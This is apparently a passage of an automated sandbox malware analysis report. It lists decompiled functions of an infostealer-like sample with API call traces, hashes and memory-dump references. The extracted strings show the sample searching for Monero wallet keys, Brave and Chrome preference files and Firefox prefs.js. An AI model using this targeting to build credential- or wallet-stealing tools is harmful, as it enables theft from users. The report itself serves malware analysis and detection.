                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: 897393f332a8e1481254c598692e2a4da3168f478389227ec60c3f3ad165331e
                              • Instruction ID: 1962c05ab1807d0b664fd982d1d78299903a9949bb4454257619de4b2cd59081
                              • Opcode Fuzzy Hash: 897393f332a8e1481254c598692e2a4da3168f478389227ec60c3f3ad165331e
                              • Instruction Fuzzy Hash: E6A130B1A002189BDB24DFA4DC85FEA7378FB58301F048589F61DD6181EB759B85CFA2
                              Function 0085BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 0086A920: lstrcpy.KERNEL32(00000000,?), ref: 0086A972
                                • Part of subcall function 0086A920: lstrcat.KERNEL32(00000000), ref: 0086A982
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                              • FindFirstFileA.KERNEL32(00000000,?,00870B32,00870B2B,00000000,?,?,?,008713F4,00870B2A), ref: 0085BEF5
                              • StrCmpCA.SHLWAPI(?,008713F8), ref: 0085BF4D
                              • StrCmpCA.SHLWAPI(?,008713FC), ref: 0085BF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0085C7BF
                              • FindClose.KERNEL32(000000FF), ref: 0085C7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: d67bd0b7ecc53ff48fe45bc6748aa1ee076d4a6c70c339304b82e27e3646db2a
                              • Instruction ID: 3cadbe88a6e75df9fb62ff42b5485f11108bffb0ff16416c0dc9b81e6f1cdf66
                              • Opcode Fuzzy Hash: d67bd0b7ecc53ff48fe45bc6748aa1ee076d4a6c70c339304b82e27e3646db2a
                              • Instruction Fuzzy Hash: 154222729101049BCB18FBA8DD96EED7379FB94300F418569B90AE7181EE349B49CF93
                              Function 00864910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 0086492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 00864943
                              • StrCmpCA.SHLWAPI(?,00870FDC), ref: 00864971
                              • StrCmpCA.SHLWAPI(?,00870FE0), ref: 00864987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00864B7D
                              • FindClose.KERNEL32(000000FF), ref: 00864B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: 8d50cab933bfe3bc6a10cb337e8b21bd8afbe5cdae1b942368103c564d53f35a
                              • Instruction ID: 728149b9bda4b59a9a8f903cebfed3103b015dd52896862604cef5258f4fd2c7
                              • Opcode Fuzzy Hash: 8d50cab933bfe3bc6a10cb337e8b21bd8afbe5cdae1b942368103c564d53f35a
                              • Instruction Fuzzy Hash: 506142B1500218ABCB24EBE4DC49EEA7378FB58701F048589E509D6145EE74EB45CF92
                              Function 00864570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00864580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00864587
                              • wsprintfA.USER32 ref: 008645A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 008645BD
                              • StrCmpCA.SHLWAPI(?,00870FC4), ref: 008645EB
                              • StrCmpCA.SHLWAPI(?,00870FC8), ref: 00864601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0086468B
                              • FindClose.KERNEL32(000000FF), ref: 008646A0
                              • lstrcat.KERNEL32(?,015CE500), ref: 008646C5
                              • lstrcat.KERNEL32(?,015CD6D8), ref: 008646D8
                              • lstrlen.KERNEL32(?), ref: 008646E5
                              • lstrlen.KERNEL32(?), ref: 008646F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: b428ef53a88117caddcffda37ad1ed843fa1fcb5b299d19a6aad3918d2ecb0aa
                              • Instruction ID: 97832abe4d6af1803b5e7be9bca8a3ac69612a05a19db6d64bbd6f13ebff37be
                              • Opcode Fuzzy Hash: b428ef53a88117caddcffda37ad1ed843fa1fcb5b299d19a6aad3918d2ecb0aa
                              • Instruction Fuzzy Hash: D05133B16002189BCB24EBB4DC89FED737CFB64701F40858AB609D6190EF749A858F92
                              Function 00863EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 00863EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 00863EDA
                              • StrCmpCA.SHLWAPI(?,00870FAC), ref: 00863F08
                              • StrCmpCA.SHLWAPI(?,00870FB0), ref: 00863F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0086406C
                              • FindClose.KERNEL32(000000FF), ref: 00864081
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: db9ff35ceeafb74d750ade863b76c14de21816355c757247f2630d32e6ea74c5
                              • Instruction ID: 124c89a0e615a8aa279d70c9124febb5baaccdfc679196df1234c2903d35b1cf
                              • Opcode Fuzzy Hash: db9ff35ceeafb74d750ade863b76c14de21816355c757247f2630d32e6ea74c5
                              • Instruction Fuzzy Hash: 2C5158B1910218ABCB24EBF4DC85EEA737CFB54300F048589B659D6140EF75DB868F92
                              Function 0085ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 0085ED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 0085ED55
                              • StrCmpCA.SHLWAPI(?,00871538), ref: 0085EDAB
                              • StrCmpCA.SHLWAPI(?,0087153C), ref: 0085EDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0085F2AE
                              • FindClose.KERNEL32(000000FF), ref: 0085F2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: 59b410475010d3bfefabc781c287f71df8b6bf2c6c5c513f72dd6dad100a2fc5
                              • Instruction ID: 20292fc47f7041222a5ecbd2d197bd8d5619c138b2908a2390f9f97503526c3a
                              • Opcode Fuzzy Hash: 59b410475010d3bfefabc781c287f71df8b6bf2c6c5c513f72dd6dad100a2fc5
                              • Instruction Fuzzy Hash: 1DE1B1719111189ADB58FB64DC96EEE7338FF54300F4145A9B51AF2092EE306B8ACF93
                              Function 0085F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 0086A920: lstrcpy.KERNEL32(00000000,?), ref: 0086A972
                                • Part of subcall function 0086A920: lstrcat.KERNEL32(00000000), ref: 0086A982
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008715B8,00870D96), ref: 0085F71E
                              • StrCmpCA.SHLWAPI(?,008715BC), ref: 0085F76F
                              • StrCmpCA.SHLWAPI(?,008715C0), ref: 0085F785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0085FAB1
                              • FindClose.KERNEL32(000000FF), ref: 0085FAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: 1db372583c48fc6d5f0f98b64d785de4627a4732f3ad294b277b4d82fa4c7037
                              • Instruction ID: dc8cef62c5049e1848a7a37646317194e64455562235bafb1f3f118f0145cc89
                              • Opcode Fuzzy Hash: 1db372583c48fc6d5f0f98b64d785de4627a4732f3ad294b277b4d82fa4c7037
                              • Instruction Fuzzy Hash: ADB133719001189BCB28EF68DC96AEE7379FF54300F4181A9A90AE7152EF305B49CF93
                              Function 00C2608E Relevance: 15.4, Strings: 11, Instructions: 1676COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: (c>_$*u_$7-I@$F~$H15=$kx|~$sX>?$t_{$~g?$"Q$Mg
                              • API String ID: 0-848234313
                              • Opcode ID: 6455bc3a3ce941fdf0057011830cf58fea937d47cf675436e8032454f6686557
                              • Instruction ID: 43c068bc7fc64b79a005b083664d1cf0d3d298cb33b3e600cbb5e6234477f9c3
                              • Opcode Fuzzy Hash: 6455bc3a3ce941fdf0057011830cf58fea937d47cf675436e8032454f6686557
                              • Instruction Fuzzy Hash: FBB228F3A0C2049FE3046E2DEC8567ABBE9EF94720F1A853DEAC5C7744E93558058693
                              Function 008516D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0087510C,?,?,?,008751B4,?,?,00000000,?,00000000), ref: 00851923
                              • StrCmpCA.SHLWAPI(?,0087525C), ref: 00851973
                              • StrCmpCA.SHLWAPI(?,00875304), ref: 00851989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00851D40
                              • DeleteFileA.KERNEL32(00000000), ref: 00851DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00851E20
                              • FindClose.KERNEL32(000000FF), ref: 00851E32
                                • Part of subcall function 0086A920: lstrcpy.KERNEL32(00000000,?), ref: 0086A972
                                • Part of subcall function 0086A920: lstrcat.KERNEL32(00000000), ref: 0086A982
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: 0a1397f9d866cb0092f75e2f6ee5163741bd37e8f44b271dad37795ef8feccff
                              • Instruction ID: 7f32e39060e4c6c4c4d67d1d29d75c8897927a6932937b1493024808078437e2
                              • Opcode Fuzzy Hash: 0a1397f9d866cb0092f75e2f6ee5163741bd37e8f44b271dad37795ef8feccff
                              • Instruction Fuzzy Hash: 1212E8719101189ADB19EB64CC96AEEB378FF54300F5141A9A51AF3191EF306F89CFA2
                              Function 0085DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00870C2E), ref: 0085DE5E
                              • StrCmpCA.SHLWAPI(?,008714C8), ref: 0085DEAE
                              • StrCmpCA.SHLWAPI(?,008714CC), ref: 0085DEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0085E3E0
                              • FindClose.KERNEL32(000000FF), ref: 0085E3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
